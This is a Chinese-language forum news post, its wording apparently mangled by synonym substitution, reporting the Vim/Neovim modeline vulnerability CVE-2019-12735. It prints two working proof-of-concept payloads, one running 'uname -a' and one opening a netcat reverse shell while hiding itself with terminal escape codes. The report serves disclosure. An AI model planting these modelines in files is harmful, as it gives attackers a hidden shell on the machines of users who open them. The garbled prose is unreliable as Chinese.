明升ms88社区

 找回暗码
 注册
明升ms88社区 主页 IT归纳资讯 检查内容

Vim与Neovim曝出恣意代码履行缝隙

2019-6-15 10:29| 发布者: joejoe0332| 检查: 452| 谈论: 0|原作者: oschina|来自: oschina

摘要: 安全研究人员发现Vim 与 Neovim 中存在一个恣意履行缝隙,答应黑客在用户翻开歹意文本文件时操控计算机。缝隙影响 Vim 8.1.1365 与Neovim 0.3.6 之前的一切版别。 该缝隙存在于编辑器的 modeline(形式行)功用,此 ...

安全研究人员发现 Vim 与 Neovim 中存在一个恣意履行缝隙,答应黑客在用户翻开歹意文本文件时操控计算机。缝隙影响 Vim 8.1.1365 与 Neovim 0.3.6 之前的一切版别。

该缝隙存在于编辑器的 modeline(形式行)功用,此功用答使用户在文本文件的最初或结束设置窗口尺度和其它自界说选项,它在一个被操作体系封闭的沙箱中运转,而且可用指令也被约束,可是研究人员 Arminius 发现了绕过该安全维护的办法。

现在缝隙现已被编号为 CVE-2019-12735,Arminius 也释出了两个概念验证。

榜首个是直接运用该缝隙使体系履行`uname -a`指令:

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

另一个运用方法愈加深化,一旦用户翻开文件就主动发动反向 shell。为了躲藏进犯,文件将在翻开时当即重写。此外,当运用 cat 输出内容时,进犯还运用终端转义序列躲藏 modeline:

\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n

现在补丁也现已释出:

更详细的细节见:

https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md

  • 快毕业了,没作业经验,
    找份作业好难啊?
    赶忙去人才芯片公司锻炼吧!!

最新谈论

关于LUPA|人才芯片工程|人才招聘|LUPA认证|LUPA教育|明升ms88社区 ( 浙B2-20090187  

回来顶部